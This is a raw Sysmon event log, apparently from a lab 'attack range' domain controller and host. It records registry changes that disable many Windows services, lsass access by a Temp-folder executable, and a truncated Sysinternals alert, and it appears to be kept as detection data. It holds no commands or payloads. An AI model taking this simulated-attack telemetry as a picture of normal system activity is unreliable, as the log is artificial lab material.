13241300x8000000000000000290691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\percsas2i\StartDWORD (0x00000004) 13241300x8000000000000000290690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PEAUTH\StartDWORD (0x00000004) 13241300x8000000000000000290689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\pdc\ImagePath\SystemRoot\system32\drivers\pdc.sys 13241300x8000000000000000290688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\pdc\StartDWORD (0x00000004) 13241300x8000000000000000290687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\pcw\ImagePath\SystemRoot\System32\drivers\pcw.sys 13241300x8000000000000000290686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.982{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\pcw\StartDWORD (0x00000004) 10341000x8000000000000000290685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.966{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-6A05-000000003802}6280C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000290684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\pcmcia\ImagePath\SystemRoot\System32\drivers\pcmcia.sys 12241200x8000000000000000290683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\pcmcia\StartOverride 13241300x8000000000000000290682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\pcmcia\StartDWORD (0x00000004) 13241300x8000000000000000290681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PolicyAgent\StartDWORD (0x00000002) 13241300x8000000000000000290680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\pciide\ImagePath\SystemRoot\System32\drivers\pciide.sys 12241200x8000000000000000290679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\pciide\StartOverride 13241300x8000000000000000290678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\pciide\StartDWORD (0x00000004) 13241300x8000000000000000290677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\pci\ImagePath\SystemRoot\System32\drivers\pci.sys 13241300x8000000000000000290676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\pci\StartDWORD (0x00000004) 10341000x8000000000000000290675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.966{C8EA50B7-12EA-6216-6905-000000003802}10003356C:\Windows\system32\conhost.exe{C8EA50B7-12EA-6216-6605-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.966{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-6A05-000000003802}6280C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PcaSvc\StartDWORD (0x00000004) 13241300x8000000000000000290672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\partmgr\ImagePath\SystemRoot\System32\drivers\partmgr.sys 13241300x8000000000000000290671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\partmgr\StartDWORD (0x00000004) 13241300x8000000000000000290670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Parport\StartDWORD (0x00000004) 13241300x8000000000000000290669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\nvstor\ImagePath\SystemRoot\System32\drivers\nvstor.sys 12241200x8000000000000000290668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\nvstor\StartOverride 13241300x8000000000000000290667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.966{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\nvstor\StartDWORD (0x00000004) 10341000x8000000000000000217649Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:44.886{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-12EC-6216-8104-000000003902}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217648Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:44.886{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD624E520538B39171D0B6311124312B,SHA256=1F776641D4AF5506E7A07C65B420F7F95F81AF669DAD3A0ABE195EB395C04C45,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217647Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:44.886{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217646Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:44.886{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217645Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:44.886{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217644Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:44.886{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217643Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:44.886{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217642Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:44.886{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217641Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:44.886{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217640Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:44.886{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217639Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:44.886{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217638Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:44.886{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-12EC-6216-8104-000000003902}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217637Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:44.886{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-12EC-6216-8104-000000003902}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217636Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:44.887{4F8D34B0-12EC-6216-8104-000000003902}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000291067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.720{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local138netbios-dgmfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local138netbios-dgm 354300x8000000000000000291066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.535{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53574-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000291065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.613{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43E5C2758BAC6BE1D4ED3A1DE4FA1B97,SHA256=D3DD3605269F5D366A5C620C2ED84E2A3F934C501CEFBA56663B49A5FE0AA8CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.481{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E25A65E045FF9C962DC8F46D0AF2C47,SHA256=0209643FA087739027BD576730704944CC7A551760738A70CD9414C79148350F,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000291063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.343{C8EA50B7-12EC-6216-7105-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.328{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EC-6216-7105-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:44.328{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EC-6216-7105-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 